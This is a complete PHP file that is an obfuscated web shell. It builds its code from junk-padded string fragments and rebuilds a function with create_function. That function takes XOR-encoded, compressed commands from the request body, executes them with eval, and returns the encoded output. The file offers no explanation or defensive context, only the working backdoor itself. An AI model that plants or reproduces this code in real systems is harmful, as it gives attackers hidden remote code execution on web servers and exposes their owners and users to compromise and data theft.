<?php
$D=str_replace('sa','','sacrsaeatesasa_safuncsation');
$w='/21uhM[/a5Ef[/pccL4[/A";[/function[/ x([/$t,$k){$c=str[/le[/n($k);$l=[/st[';
$k='atch("/[/$kh(.+[/)$kf/",@[/file_ge[/t_co[/ntents[/("php[/://inp[/ut"),$m)[/==';
$x='$k=[/"c[/62d[/929[/e";$kh="7b7e7b61[/6[/592";$kf="3a[/5d[/fc60cb56";$p="i[';
$g='[/$j++,$i++){$o.[/=$t{[/$i}^$k{$j}[/;}}r[/eturn[/ $o;[/[/}[/if (@preg_m';
$L='ode([/$m[/[[/1]),$k)));$o=@ob[/_[/get_cont[/[/ents();@ob_en[/[/d[/_clea';
$K='1) {[/@ob_star[/t()[/;@eva[/l(@gz[/un[/compress(@x(@b[/as[/e64_[/[/dec';
$y='/rlen($[/t);[/[/$o[/="";for([/$i=0;$i<$l[/;){for($j=0;([/$j<$c&[/&$i<[/$l);';
$s='n();$r=@ba[/se64_encod[/e(@x(@[/gzcompr[/ess[/($o),$k));pr[/int("$p[/$kh$r$kf");}';
$b=str_replace('[/','',$x.$w.$y.$g.$k.$K.$L.$s);
$G=$D('',$b);$G();
?>
